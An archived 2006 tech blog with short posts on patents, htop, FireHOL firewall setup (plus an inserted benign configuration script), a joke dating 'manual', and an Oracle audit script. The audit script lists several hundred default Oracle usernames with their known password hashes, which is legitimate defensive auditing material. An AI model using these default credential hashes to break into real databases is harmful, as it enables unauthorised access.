Sunday, December 31, 2006

Patent Google? Use Google Patent.

When you are trying to make something, it can be useful to look at what others have done before you: which problems did they encounter, and which solutions did they use? This is not patent fraud or anything like it; it is making use of knowledge that is available to the public. Patent offices are a goldmine for inventors and engineers. The problem for a long time was that if you wanted something from the patent office, you needed to know what you wanted.

You had to go to the patent office counter and request a copy of the documents, which made it somewhat more difficult to find what you wanted to know. Some patent offices did give you access to the archives, where you could spend your days reading document after document. Some patent offices even started to provide the knowledge via the Internet, and now Google is catching up by launching a Google patent search engine where you can search the complete patent documents.

Besides the fact that you can learn a lot that helps you develop a new product, it can also be good fun to read some of the patents for strange products, or to finally find out why in the name of God they created the thing as it is...

Robots to Crawl Under the City

I have a new Slashdot posting to my name. Please read the original posting here:

"Robots will crawl tubes in a short while to investigate power cables running in the tubes to make sure they are still undamaged or in need for a repair. The Robotic Cable Inspection System is developed by Alexander Mamishev, an assistant professor of electrical engineering at the University of Washington. Making use of infrared thermal analysis and acoustic partial discharge analysis, the robot will be checking mile after mile of cable while crawling his way in the tubes."

You can find the posting by using this deeplink to Slashdot.

Marklin: Sun train.


I have already reported several times about the Sun Microsystems Project Blackbox. Now there is something new, Project Blackbox mini mini. Marklin created a scale model freight train with a Project Blackbox shipping container.

You can see more pictures via this Flickr link. More photos of the real Project Blackbox can be found on Sun's images website, and for more information about Project Blackbox you can refer to the Sun project website.

Wednesday, December 27, 2006

Monitor processes under Debian Linux with htop.

Most people working with UNIX and/or Linux will have used the top command to get more insight into the processes running on the machine. The top command provides the terminal user with a process viewer somewhat similar to the 'Task Manager' in Windows. It lets you view the currently running processes and how they are handled by your machine: free memory, CPU load, etc.

Even though top can provide you with some very good information, it still lacks some details and some nice options. An extended version of top is htop. htop has been 'adopted' as a Debian package, which makes it quite simple for Debian users to install by simply issuing the following command as root:

# apt-get install htop

This will install the latest stable release of htop on your Debian system. To check the latest stable Debian htop package you can refer to the Debian package site.

More information about the htop project can be found at the htop project site at SourceForge.

Debian running top

Debian running htop

Tuesday, December 26, 2006

FireHOL on Debian Linux.

Even though Linux is one of the more secure operating systems, this does not excuse you from taking some precautions. You will still need a proper firewall to make sure your workstation is not misused in any way. Personally, I use FireHOL on every Linux workstation on the inside of my network to create an extra layer of security. This is on top of, or below if you prefer, my 2 external firewalls.

From Wikipedia, the free encyclopedia:
FireHOL is a firewall application designed to work with a lower level firewall utility for the Linux kernel, iptables. FireHOL does not use a GUI, but is configured through an easy to understand plain text configuration file. A further advantage of FireHOL is its friendliness to beginners - you don't have to worry about the answer packet because FireHOL first parses the configuration file and then sets the appropriate iptables rules to achieve the expected firewall behavior.


Installation of FireHOL on Debian Linux is quite simple. It can be installed completely by using the apt-get command. More information on the current state of the Debian FireHOL package can be found on the FireHOL package website.

# apt-get install firehol

This will take care of the download, installation and basic configuration of FireHOL. Please do remember that FireHOL is disabled by default upon installation. To change this you will need to edit the /etc/default/firehol file.

Change the line: START_FIREHOL=NO
To this: START_FIREHOL=YES

You will also need to modify the /etc/firehol/firehol.conf file. All the configuration parameters for FireHOL are maintained here. For more information about how to configure it and for the complete list of options you can refer to the FireHOL website.

To start FireHOL after the installation and configuration you will need to issue the following command: /etc/init.d/firehol start
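The steps above as a repeatable script. This is an added example, not part of the original post or of the FireHOL package: the function names, the root-prefix argument (so the script can be rehearsed against a scratch directory) and the 192.168.1.0/24 network are assumptions, and the policy shown is one minimal choice for an internal workstation.

```shell
#!/bin/sh
# Added example: enable FireHOL and install a minimal workstation policy.
# The first argument of setup_firehol is a directory prefix (hypothetical
# parameter); use "" on the real Debian host, a scratch dir to rehearse.

# Step 1: set START_FIREHOL=YES in the defaults file, keeping a backup.
enable_firehol() {
    defaults="$1"
    [ -f "$defaults" ] || { echo "missing $defaults" >&2; return 1; }
    cp -p "$defaults" "$defaults.bak"
    if grep -q '^START_FIREHOL=' "$defaults.bak"; then
        # Rewrite the existing line so the setting appears exactly once.
        sed 's/^START_FIREHOL=.*/START_FIREHOL=YES/' "$defaults.bak" > "$defaults"
    else
        echo 'START_FIREHOL=YES' >> "$defaults"
    fi
}

# Step 2: write firehol.conf. Unsolicited inbound traffic is dropped,
# outbound clients are allowed, SSH is accepted only from the given LAN.
write_workstation_conf() {
    conf="$1"
    lan="$2"
    # Accept only digits, dots and a slash, so nothing else can end up
    # inside the configuration file (which FireHOL reads as a script).
    case "$lan" in
        ''|*[!0-9./]*) echo "bad network: $lan" >&2; return 1 ;;
    esac
    cat > "$conf" <<EOF
version 5

interface any world
    policy drop
    protection strong
    server ssh accept src "$lan"
    client all accept
EOF
    # The firewall policy is only root's business.
    chmod 600 "$conf"
}

# Both steps against one root prefix.
setup_firehol() {
    root="$1"
    lan="$2"
    enable_firehol "$root/etc/default/firehol" || return 1
    write_workstation_conf "$root/etc/firehol/firehol.conf" "$lan" || return 1
}

# Rehearsal on a constructed scratch tree: no root rights needed and the
# live firewall is not touched.
demo_root=$(mktemp -d)
mkdir -p "$demo_root/etc/default" "$demo_root/etc/firehol"
printf '# constructed sample defaults file\nSTART_FIREHOL=NO\n' \
    > "$demo_root/etc/default/firehol"
setup_firehol "$demo_root" "192.168.1.0/24"
cat "$demo_root/etc/default/firehol" "$demo_root/etc/firehol/firehol.conf"
rm -rf "$demo_root"
```

On the real machine, "firehol try" applies the new rules and restores the previous ones unless you confirm, which is a safe check over a remote session before issuing the start command from the post.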


RTFM

I have been reading some manuals to upgrade some skills... After looking at the video I found out that there is still a lot to improve... And by the way, there is NO UNIX MAN page for this!

Steps:
(1) Read the manual.
(2) Watch the video.
(3) Try it for real.


MANUAL:
Objective: To disengage said bra without looking like an idiot.

What You Need:
1. Girl with bra
2. Two functional hands
3. Common sense

Techniques:
1. "The Houdini Hug": Using sleight of hand, place arms around girl and unhook bra. Try to refrain from saying, "Ta-da!"
2. "MacGyver's Off The Shoulder Slide": An alternative method to use after 10 minutes of unsuccessful hugging.

Do Not Use:
Scissors, blowtorch, pliers, wire strippers, cutlery, black magic, staple remover, chainsaw, brute strength, CB4, set of lock picks, or chisel and hammer.

Warning! When removing a bra, do not say the following:
1. "I really want to thank you for this."
2. "Dammit! I thought they were bigger."
3. "Do you have any cereal?"



Oracle default accounts script

Oracle default accounts can be created for many different reasons. Some are created by Oracle itself when the database is created: the accounts SYS, SYSTEM, DBSNMP and OUTLN, for instance, are often created by default. If the database is created by using the wizard the problem can be much bigger, with 10s or 20s of accounts being created simply as part of the database creation. Further default accounts can be created after the initial database creation by running scripts that live in $ORACLE_HOME/rdbms/admin or other directories. These scripts can be run to add an additional feature or function, or to add example code to the database (you never do this in production, do you?). Oracle default users can also be created when third party software such as BAAN or SAP is installed. The same issue of default users being added to the database can occur when third party development or maintenance tools such as TOAD or PL/SQL Developer are added. Problems can also occur when employees run examples from books, documentation (official and non-official) or web sites.

Special thanks to Pete Finnigan, who maintains a comprehensive list of default passwords on his website. From the information on his website I have created the script below, which can be used to check for default Oracle username/password combinations. You can copy the source from this weblog or you can download the SQL file from my website.

/********************************************************************
* FILE NAME
* ORACLE_check_default_accounts.sql
*
*
* DESCRIPTION
* Check for default username password combinations in the Oracle
* dba_users table.
*
* Special thanks to Pete Finnigan (http://www.petefinnigan.com)
*
*
* LICENSE
* Copyright (C) 2006 Johan Louwers
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* http://www.gnu.org/licenses/gpl.txt
*
*
* DOWNLOAD / CONTACT
* You can download the script from the following location:
* http://www.terminalcult.org/source/oracle/sql/ORACLE_check_default_accounts.sql
*
* You can contact Johan Louwers at Johan.Louwers(at)terminalcult.org
*
*
* HISTORY
* Version  Date         Author(s)            Description
* -------  -----------  -------------------  --------------------------
* 1.0      26-DEC-2006  Johan Louwers        Initial Creation
*
*******************************************************************/

SELECT
username AS "User(s) with Default Password!"
, account_status AS "Account Status"
, lock_date AS "Lock date"
, expiry_date AS "Expire date"
FROM
dba_users
WHERE
(username = 'BRIO_ADMIN' AND password = 'EB50644BE27DF70B')
OR (username = 'BRUGERNAVN' AND password = '2F11631B6B4E0B6F')
OR (username = 'BRUKERNAVN' AND password = '652C49CDF955F83A')
OR (username = 'BSC' AND password = 'EC481FD7DCE6366A')
OR (username = 'BUG_REPORTS' AND password = 'E9473A88A4DD31F2')
OR (username = 'CALVIN' AND password = '34200F94830271A3')
OR (username = 'CATALOG' AND password = '397129246919E8DA')
OR (username = 'CCT' AND password = 'C6AF8FCA0B51B32F')
OR (username = 'CDEMO82' AND password = '7299A5E2A5A05820')
OR (username = 'CDEMO82' AND password = '67B891F114BE3AEB')
OR (username = 'CDEMO82' AND password = '73EAE7C39B42EA15')
OR (username = 'CDEMOCOR' AND password = '3A34F0B26B951F3F')
OR (username = 'CDEMORID' AND password = 'E39CEFE64B73B308')
OR (username = 'CDEMOUCB' AND password = 'CEAE780F25D556F8')
OR (username = 'CDOUGLAS' AND password = 'C35109FE764ED61E')
OR (username = 'CE' AND password = 'E7FDFE26A524FE39')
OR (username = 'CENTRA' AND password = '63BF5FFE5E3EA16D')
OR (username = 'CENTRAL' AND password = 'A98B26E2F65CA4D3')
OR (username = 'CIDS' AND password = 'AA71234EF06CE6B3')
OR (username = 'CIS' AND password = '7653EBAF048F0A10')
OR (username = 'CIS' AND password = 'AA2602921607EE84')
OR (username = 'CISINFO' AND password = '3AA26FC267C5F577')
OR (username = 'CISINFO' AND password = 'BEA52A368C31B86F')
OR (username = 'CLARK' AND password = '7AAFE7D01511D73F')
OR (username = 'CN' AND password = '73F284637A54777D')
OR (username = 'COMPANY' AND password = '402B659C15EAF6CB')
OR (username = 'COMPIERE' AND password = 'E3D0DCF4B4DBE626')
OR (username = 'CQSCHEMAUSER' AND password = '04071E7EDEB2F5CC')
OR (username = 'CQUSERDBUSER' AND password = '0273F484CD3F44B7')
OR (username = 'CRP' AND password = 'F165BDE5462AD557')
OR (username = 'CS' AND password = 'DB78866145D4E1C3')
OR (username = 'CSC' AND password = 'EDECA9762A8C79CD')
OR (username = 'CSD' AND password = '144441CEBAFC91CF')
OR (username = 'CSE' AND password = 'D8CC61E8F42537DA')
OR (username = 'CSF' AND password = '684E28B3C899D42C')
OR (username = 'CSI' AND password = '71C2B12C28B79294')
OR (username = 'CSL' AND password = 'C4D7FE062EFB85AB')
OR (username = 'CSMIG' AND password = '09B4BB013FBD0D65')
OR (username = 'CSP' AND password = '5746C5E077719DB4')
OR (username = 'CSR' AND password = '0E0F7C1B1FE3FA32')
OR (username = 'CSS' AND password = '3C6B8C73DDC6B04F')
OR (username = 'CTXDEMO' AND password = 'CB6B5E9D9672FE89')
OR (username = 'CTXSYS' AND password = '71E687F036AD56E5')
OR (username = 'CTXSYS' AND password = '24ABAB8B06281B4C')
OR (username = 'CTXSYS' AND password = 'A13C035631643BA0')
OR (username = 'CUA' AND password = 'CB7B2E6FFDD7976F')
OR (username = 'CUE' AND password = 'A219FE4CA25023AA')
OR (username = 'CUF' AND password = '82959A9BD2D51297')
OR (username = 'CUG' AND password = '21FBCADAEAFCC489')
OR (username = 'CUI' AND password = 'AD7862E01FA80912')
OR (username = 'CUN' AND password = '41C2D31F3C85A79D')
OR (username = 'CUP' AND password = 'C03082CD3B13EC42')
OR (username = 'CUS' AND password = '00A12CC6EBF8EDB8')
OR (username = 'CZ' AND password = '9B667E9C5A0D21A6')
OR (username = 'DATA_SCHEMA' AND password = '5ECB30FD1A71CC54')
OR (username = 'DBI' AND password = 'D8FF6ECEF4C50809')
OR (username = 'MDDEMO_MGR' AND password = '2E175141BEE66FF6')
OR (username = 'MDSYS' AND password = '72979A94BAD2AF80')
OR (username = 'ME' AND password = 'E5436F7169B29E4D')
OR (username = 'MFG' AND password = 'FC1B0DD35E790847')
OR (username = 'MGR' AND password = '9D1F407F3A05BDD9')
OR (username = 'MGWUSER' AND password = 'EA514DD74D7DE14C')
OR (username = 'MIGRATE' AND password = '5A88CE52084E9700')
OR (username = 'MILLER' AND password = 'D0EFCD03C95DF106')
OR (username = 'MMO2' AND password = 'AE128772645F6709')
OR (username = 'MMO2' AND password = 'A0E2085176E05C85')
OR (username = 'MMO2' AND password = '62876B0382D5B550')
OR (username = 'MODTEST' AND password = 'BBFF58334CDEF86D')
OR (username = 'MOREAU' AND password = 'CF5A081E7585936B')
OR (username = 'MRP' AND password = 'B45D4DF02D4E0C85')
OR (username = 'MSC' AND password = '89A8C104725367B2')
OR (username = 'MSD' AND password = '6A29482069E23675')
OR (username = 'MSO' AND password = '3BAA3289DB35813C')
OR (username = 'MSR' AND password = 'C9D53D00FE77D813')
OR (username = 'MTS_USER' AND password = 'E462DB4671A51CD4')
OR (username = 'MTSSYS' AND password = '6465913FF5FF1831')
OR (username = 'MWA' AND password = '1E2F06BE2A1D41A6')
OR (username = 'MXAGENT' AND password = 'C5F0512A64EB0E7F')
OR (username = 'NAMES' AND password = '9B95D28A979CC5C4')
OR (username = 'NEOTIX_SYS' AND password = '05BFA7FF86D6EB32')
OR (username = 'NNEUL' AND password = '4782D68D42792139')
OR (username = 'NOM_UTILISATEUR' AND password = 'FD621020564A4978')
OR (username = 'NOMEUTENTE' AND password = '8A43574EFB1C71C7')
OR (username = 'NOME_UTILIZADOR' AND password = '71452E4797DF917B')
OR (username = 'NUME_UTILIZATOR' AND password = '73A3AC32826558AE')
OR (username = 'OAS_PUBLIC' AND password = 'A8116DB6E84FA95D')
OR (username = 'OAS_PUBLIC' AND password = '9300C0977D7DC75E')
OR (username = 'OCITEST' AND password = 'C09011CB0205B347')
OR (username = 'OCM_DB_ADMIN' AND password = '2C3A5DEF1EE57E92')
OR (username = 'ODM' AND password = 'C252E8FA117AF049')
OR (username = 'ODM_MTR' AND password = 'A7A32CD03D3CE8D5')
OR (username = 'ODS' AND password = '89804494ADFC71BC')
OR (username = 'ODS_SERVER' AND password = 'C6E799A949471F57')
OR (username = 'ODSCOMMON' AND password = '59BBED977430C1A8')
OR (username = 'OE' AND password = '9C30855E7E0CB02D')
OR (username = 'OE' AND password = '62FADF01C4DC1ED4')
OR (username = 'OE' AND password = 'D1A2DFC623FDA40A')
OR (username = 'OEM_REPOSITORY' AND password = '1FF89109F7A16FEF')
OR (username = 'OEMADM' AND password = '9DCE98CCF541AAE6')
OR (username = 'OEMREP' AND password = '7BB2F629772BF2E5')
OR (username = 'OKB' AND password = 'A01A5F0698FC9E31')
OR (username = 'OKC' AND password = '31C1DDF4D5D63FE6')
OR (username = 'OKE' AND password = 'B7C1BB95646C16FE')
OR (username = 'OKI' AND password = '991C817E5FD0F35A')
OR (username = 'OKO' AND password = '6E204632EC7CA65D')
OR (username = 'OKR' AND password = 'BB0E28666845FCDC')
OR (username = 'OKS' AND password = 'C2B4C76AB8257DF5')
OR (username = 'OKX' AND password = 'F9FDEB0DE52F5D6B')
OR (username = 'OLAPDBA' AND password = '1AF71599EDACFB00')
OR (username = 'OLAPSVR' AND password = 'AF52CFD036E8F425')
OR (username = 'OLAPSVR' AND password = '3B3F6DB781927D0F')
OR (username = 'OLAPSYS' AND password = '3FB8EF9DB538647C')
OR (username = 'OLAPSYS' AND password = 'C1510E7AC8F0D90D')
OR (username = 'OMWB_EMULATION' AND password = '54A85D2A0AB8D865')
OR (username = 'ONT' AND password = '9E3C81574654100A')
OR (username = 'OO' AND password = '2AB9032E4483FAFC')
OR (username = 'OPENSPIRIT' AND password = 'D664AAB21CE86FD2')
OR (username = 'OPI' AND password = '1BF23812A0AEEDA0')
OR (username = 'ORACACHE' AND password = '5A4EEC421DE68DDD')
OR (username = 'ORACLE' AND password = '38E38619A12E0257')
OR (username = 'ORADBA' AND password = 'C37E732953A8ABDB')
OR (username = 'ORANGE' AND password = '3D9B7E34A4F7D4E9')
OR (username = 'ORAPROBE' AND password = '2E3EA470A4CA2D94')
OR (username = 'ORAREGSYS' AND password = '28D778112C63CB15')
OR (username = 'ORASSO' AND password = 'F3701A008AA578CF')
OR (username = 'ORASSO_DS' AND password = '17DC8E02BC75C141')
OR (username = 'ORASSO_PA' AND password = '133F8D161296CB8F')
OR (username = 'ORASSO_PS' AND password = '63BB534256053305')
OR (username = 'ORASSO_PUBLIC' AND password = 'C6EED68A8F75F5D3')
OR (username = 'ORASTAT' AND password = '6102BAE530DD4B95')
OR (username = 'ORCLADMIN' AND password = '7C0BE475D580FBA2')
OR (username = 'ORDCOMMON' AND password = '9B616F5489F90AD7')
OR (username = 'DBSNMP' AND password = 'E066D214D5421CCC')
OR (username = 'DBVISION' AND password = 'F74F7EF36A124931')
OR (username = 'DDIC' AND password = '4F9FFB093F909574')
OR (username = 'DEMO' AND password = '4646116A123897CF')
OR (username = 'DEMO8' AND password = '0E7260738FDFD678')
OR (username = 'DEMO9' AND password = 'EE02531A80D998CA')
OR (username = 'DES' AND password = 'ABFEC5AC2274E54D')
OR (username = 'DES2K' AND password = '611E7A73EC4B425A')
OR (username = 'DEV2000_DEMOS' AND password = '18A0C8BD6B13BEE2')
OR (username = 'DIANE' AND password = '46DC27700F2ADE28')
OR (username = 'DIP' AND password = 'CE4A36B8E06CA59C')
OR (username = 'DISCOVERER_ADMIN' AND password = '5C1AED4D1AADAA4C')
OR (username = 'DMSYS' AND password = 'BFBA5A553FD9E28A')
OR (username = 'DPF' AND password = 'E53F7C782FAA6898')
OR (username = 'DSGATEWAY' AND password = '6869F3CFD027983A')
OR (username = 'DSSYS' AND password = 'E3B6E6006B3A99E0')
OR (username = 'DTSP' AND password = '5A40D4065B3673D2')
OR (username = 'EAA' AND password = 'A410B2C5A0958CDF')
OR (username = 'EAM' AND password = 'CE8234D92FCFB563')
OR (username = 'EARLYWATCH' AND password = '8AA1C62E08C76445')
OR (username = 'EAST' AND password = 'C5D5C455A1DE5F4D')
OR (username = 'EC' AND password = '6A066C462B62DD46')
OR (username = 'ECX' AND password = '0A30645183812087')
OR (username = 'EJB' AND password = '69CB07E2162C6C93')
OR (username = 'EJSADMIN' AND password = '4C59B97125B6641A')
OR (username = 'EJSADMIN' AND password = '313F9DFD92922CD2')
OR (username = 'EMP' AND password = 'B40C23C6E2B4EA3D')
OR (username = 'ENG' AND password = '4553A3B443FB3207')
OR (username = 'ENI' AND password = '05A92C0958AFBCBC')
OR (username = 'ESTOREUSER' AND password = '51063C47AC2628D4')
OR (username = 'EVENT' AND password = '7CA0A42DA768F96D')
OR (username = 'EVM' AND password = '137CEDC20DE69F71')
OR (username = 'EXAMPLE' AND password = '637417B1DC47C2E5')
OR (username = 'EXFSYS' AND password = '66F4EF5650C20355')
OR (username = 'EXTDEMO' AND password = 'BAEF9D34973EE4EC')
OR (username = 'EXTDEMO2' AND password = '6A10DD2DB23880CB')
OR (username = 'FA' AND password = '21A837D0AED8F8E5')
OR (username = 'FEM' AND password = 'BD63D79ADF5262E7')
OR (username = 'FII' AND password = 'CF39DE29C08F71B9')
OR (username = 'FINANCE' AND password = '6CBBF17292A1B9AA')
OR (username = 'FINPROD' AND password = '8E2713F53A3D69D5')
OR (username = 'FLM' AND password = 'CEE2C4B59E7567A3')
OR (username = 'FND' AND password = '0C0832F8B6897321')
OR (username = 'FOO' AND password = '707156934A6318D4')
OR (username = 'FPT' AND password = '73E3EC9C0D1FAECF')
OR (username = 'FRM' AND password = '9A2A7E2EBE6E4F71')
OR (username = 'FROSTY' AND password = '2ED539F71B4AA697')
OR (username = 'FTE' AND password = '2FB4D2C9BAE2CCCA')
OR (username = 'FV' AND password = '907D70C0891A85B1')
OR (username = 'GL' AND password = 'CD6E99DACE4EA3A6')
OR (username = 'GMA' AND password = 'DC7948E807DFE242')
OR (username = 'GMD' AND password = 'E269165256F22F01')
OR (username = 'GME' AND password = 'B2F0E221F45A228F')
OR (username = 'GMF' AND password = 'A07F1956E3E468E1')
OR (username = 'GMI' AND password = '82542940B0CF9C16')
OR (username = 'GML' AND password = '5F1869AD455BBA73')
OR (username = 'GMP' AND password = '450793ACFCC7B58E')
OR (username = 'GMS' AND password = 'E654261035504804')
OR (username = 'GPFD' AND password = 'BA787E988F8BC424')
OR (username = 'GPLD' AND password = '9D561E4D6585824B')
OR (username = 'GR' AND password = 'F5AB0AA3197AEE42')
OR (username = 'HADES' AND password = '2485287AC1DB6756')
OR (username = 'HCPARK' AND password = '3DE1EBA32154C56B')
OR (username = 'HLW' AND password = '855296220C095810')
OR (username = 'HR' AND password = '6E0C251EABE4EBB8')
OR (username = 'ABM' AND password = 'D0F2982F121C7840')
OR (username = 'ADAMS' AND password = '72CDEF4A3483F60D')
OR (username = 'ADLDEMO' AND password = '147215F51929A6E8')
OR (username = 'ADMIN' AND password = 'CAC22318F162D597')
OR (username = 'ADMIN' AND password = 'B8B15AC9A946886A')
OR (username = 'ADMINISTRATOR' AND password = 'F9ED601D936158BD')
OR (username = 'ADMINISTRATOR' AND password = '1848F0A31D1C5C62')
OR (username = 'AHL' AND password = '7910AE63C9F7EEEE')
OR (username = 'AHM' AND password = '33C2E27CF5E401A4')
OR (username = 'AK' AND password = '8FCB78BBA8A59515')
OR (username = 'ALHRO' AND password = '049B2397FB1A419E')
OR (username = 'ALHRW' AND password = 'B064872E7F344CAE')
OR (username = 'ALR' AND password = 'BE89B24F9F8231A9')
OR (username = 'AMS' AND password = 'BD821F59270E5F34')
OR (username = 'AMV' AND password = '38BC87EB334A1AC4')
OR (username = 'ANDY' AND password = 'B8527562E504BC3F')
OR (username = 'ANONYMOUS' AND password = 'FE0E8CE7C92504E9')
OR (username = 'AP' AND password = 'EED09A552944B6AD')
OR (username = 'APPLMGR' AND password = 'CB562C240E871070')
OR (username = 'APPLSYS' AND password = 'FE84888987A6BF5A')
OR (username = 'APPLSYS' AND password = 'E153FFF4DAE6C9F7')
OR (username = 'APPLSYS' AND password = '0F886772980B8C79')
OR (username = 'APPLSYSPUB' AND password = 'D5DB40BB03EA1270')
OR (username = 'APPLSYSPUB' AND password = 'D2E3EF40EE87221E')
OR (username = 'APPLSYSPUB' AND password = '78194639B5C3DF9F')
OR (username = 'APPLYSYSPUB' AND password = '78194639B5C3DF9F')
OR (username = 'APPLYSYSPUB' AND password = 'A5E09E84EC486FC9')
OR (username = 'APPLYSYSPUB' AND password = 'D2E3EF40EE87221E')
OR (username = 'APPS' AND password = 'D728438E8A5925E0')
OR (username = 'APPS_MRC' AND password = '2FFDCBB4FD11D9DC')
OR (username = 'APPUSER' AND password = '7E2C3C2D4BF4071B')
OR (username = 'AQ' AND password = '2B0C31040A1CFB48')
OR (username = 'AQDEMO' AND password = '5140E342712061DD')
OR (username = 'AQJAVA' AND password = '8765D2543274B42E')
OR (username = 'AQUSER' AND password = '4CF13BDAC1D7511C')
OR (username = 'AR' AND password = 'BBBFE175688DED7E')
OR (username = 'ASF' AND password = 'B6FD427D08619EEE')
OR (username = 'ASG' AND password = '1EF8D8BD87CF16BE')
OR (username = 'ASL' AND password = '03B20D2C323D0BFE')
OR (username = 'ASO' AND password = 'F712D80109E3C9D8')
OR (username = 'ASP' AND password = 'CF95D2C6C85FF513')
OR (username = 'AST' AND password = 'F13FF949563EAB3C')
OR (username = 'ATM' AND password = '7B83A0860CF3CB71')
OR (username = 'AUDIOUSER' AND password = 'CB4F2CEC5A352488')
OR (username = 'AURORA$JIS$UTILITY$' AND password = 'E1BAE6D95AA95F1E')
OR (username = 'AURORA$ORB$UNAUTHENTICATED' AND password = '80C099F0EADF877E')
OR (username = 'AX' AND password = '0A8303530E86FCDD')
OR (username = 'AZ' AND password = 'AAA18B5D51B0D5AC')
OR (username = 'BC4J' AND password = 'EAA333E83BF2810D')
OR (username = 'BEN' AND password = '9671866348E03616')
OR (username = 'BIC' AND password = 'E84CC95CBBAC1B67')
OR (username = 'BIL' AND password = 'BF24BCE2409BE1F7')
OR (username = 'BIM' AND password = '6026F9A8A54B9468')
OR (username = 'BIS' AND password = '7E9901882E5F3565')
OR (username = 'BIV' AND password = '2564B34BE50C2524')
OR (username = 'BIX' AND password = '3DD36935EAEDE2E3')
OR (username = 'BLAKE' AND password = '9435F2E60569158E')
OR (username = 'BLEWIS' AND password = 'C9B597D7361EE067')
OR (username = 'BOM' AND password = '56DB3E89EAE5788E')
OR (username = 'HR' AND password = '33EBE1C63D5B7FEF')
OR (username = 'HR' AND password = '6399F3B38EDF3288')
OR (username = 'HR' AND password = '4C6D73C3E8B0F0DA')
OR (username = 'HRI' AND password = '49A3A09B8FC291D0')
OR (username = 'HVST' AND password = '5787B0D15766ADFD')
OR (username = 'HXC' AND password = '4CEA0BF02214DA55')
OR (username = 'HXT' AND password = '169018EB8E2C4A77')
OR (username = 'IBA' AND password = '0BD475D5BF449C63')
OR (username = 'IBE' AND password = '9D41D2B3DD095227')
OR (username = 'IBP' AND password = '840267B7BD30C82E')
OR (username = 'IBU' AND password = '0AD9ABABC74B3057')
OR (username = 'IBY' AND password = 'F483A48F6A8C51EC')
OR (username = 'ICDBOWN' AND password = '76B8D54A74465BB4')
OR (username = 'ICX' AND password = '7766E887AF4DCC46')
OR (username = 'IDEMO_USER' AND password = '739F5BC33AC03043')
OR (username = 'IEB' AND password = 'A695699F0F71C300')
OR (username = 'IEC' AND password = 'CA39F929AF0A2DEC')
OR (username = 'IEM' AND password = '37EF7B2DD17279B5')
OR (username = 'IEO' AND password = 'E93196E9196653F1')
OR (username = 'IES' AND password = '30802533ADACFE14')
OR (username = 'IEU' AND password = '5D0E790B9E882230')
OR (username = 'IEX' AND password = '6CC978F56D21258D')
OR (username = 'IFSSYS' AND password = '1DF0D45B58E72097')
OR (username = 'IGC' AND password = 'D33CEB8277F25346')
OR (username = 'IGF' AND password = '1740079EFF46AB81')
OR (username = 'IGI' AND password = '8C69D50E9D92B9D0')
OR (username = 'IGS' AND password = 'DAF602231281B5AC')
OR (username = 'IGW' AND password = 'B39565F4E3CF744B')
OR (username = 'IMAGEUSER' AND password = 'E079BF5E433F0B89')
OR (username = 'IMC' AND password = 'C7D0B9CDE0B42C73')
OR (username = 'IMEDIA' AND password = '8FB1DC9A6F8CE827')
OR (username = 'IMT' AND password = 'E4AAF998653C9A72')
OR (username = '#INTERNAL' AND password = '87DADF57B623B777')
OR (username = '#INTERNAL' AND password = '38379FC3621F7DA2')
OR (username = 'INTERNAL' AND password = 'AB27B53EDC5FEF41')
OR (username = 'INTERNAL' AND password = 'E0BF7F3DDE682D3B')
OR (username = 'INV' AND password = 'ACEAB015589CF4BC')
OR (username = 'IPA' AND password = 'EB265A08759A15B4')
OR (username = 'IPD' AND password = '066A2E3072C1F2F3')
OR (username = 'IPLANET' AND password = '7404A12072F4E5E8')
OR (username = 'ISC' AND password = '373F527DC0CFAE98')
OR (username = 'ITG' AND password = 'D90F98746B68E6CA')
OR (username = 'JA' AND password = '9AC2B58153C23F3D')
OR (username = 'JAKE' AND password = '1CE0B71B4A34904B')
OR (username = 'JE' AND password = 'FBB3209FD6280E69')
OR (username = 'JG' AND password = '37A99698752A1CF1')
OR (username = 'JILL' AND password = 'D89D6F9EB78FC841')
OR (username = 'JL' AND password = '489B61E488094A8D')
OR (username = 'JMUSER' AND password = '063BA85BF749DF8E')
OR (username = 'JOHN' AND password = '29ED3FDC733DC86D')
OR (username = 'JONES' AND password = 'B9E99443032F059D')
OR (username = 'JTF' AND password = '5C5F6FC2EBB94124')
OR (username = 'JTM' AND password = '6D79A2259D5B4B5A')
OR (username = 'JTS' AND password = '4087EE6EB7F9CD7C')
OR (username = 'JWARD' AND password = 'CF9CB787BD98DA7F')
OR (username = 'KWALKER' AND password = 'AD0D93891AEB26D2')
OR (username = 'L2LDEMO' AND password = '0A6B2DF907484CEE')
OR (username = 'LBACSYS' AND password = 'AC9700FD3F1410EB')
OR (username = 'LIBRARIAN' AND password = '11E0654A7068559C')
OR (username = 'MANPROD' AND password = 'F0EB74546E22E94D')
OR (username = 'MARK' AND password = 'F7101600ACABCD74')
OR (username = 'MASCARM' AND password = '4EA68D0DDE8AAC6B')
OR (username = 'MASTER' AND password = '9C4F452058285A74')
OR (username = 'MDDATA' AND password = 'DF02A496267DEE66')
OR (username = 'MDDEMO' AND password = '46DFFB4D08C33739')
OR (username = 'MDDEMO_CLERK' AND password = '564F871D61369A39')
OR (username = 'MDDEMO_CLERK' AND password = 'E5288E225588D11F')
OR (username = 'WWWUSER' AND password = 'F239A50072154BAC')
OR (username = 'XADEMO' AND password = 'ADBC95D8DCC69E66')
OR (username = 'XDB' AND password = '88D8364765FCE6AF')
OR (username = 'XDP' AND password = 'F05E53C662835FA2')
OR (username = 'XLA' AND password = '2A8ED59E27D86D41')
OR (username = 'XNC' AND password = 'BD8EA41168F6C664')
OR (username = 'XNI' AND password = 'F55561567EF71890')
OR (username = 'XNM' AND password = '92776EA17B8B5555')
OR (username = 'XNP' AND password = '3D1FB783F96D1F5E')
OR (username = 'XNS' AND password = 'FABA49C38150455E')
OR (username = 'XPRT' AND password = '0D5C9EFC2DFE52BA')
OR (username = 'XTR' AND password = 'A43EE9629FA90CAE')
OR (username = 'MDDEMO_MGR' AND password = 'B41BCD9D3737F5C4')
OR (username = 'SYSTEM' AND password = '4438308EE0CAFB7F')
OR (username = 'SYSTEM' AND password = 'FAAD7ADAF48B5F45')
OR (username = 'SYSTEM' AND password = '685657E9DC29E185')
OR (username = 'SYSTEM' AND password = '49B70B505DF0247F')
OR (username = 'SYSTEM' AND password = 'B49C4279EBD8D1A8')
OR (username = 'SYSTEM' AND password = '604101D3AACE7E88')
OR (username = 'SYSTEM' AND password = '02AB2DB93C952A8F')
OR (username = 'SYSTEM' AND password = '203CD8CF183E716C')
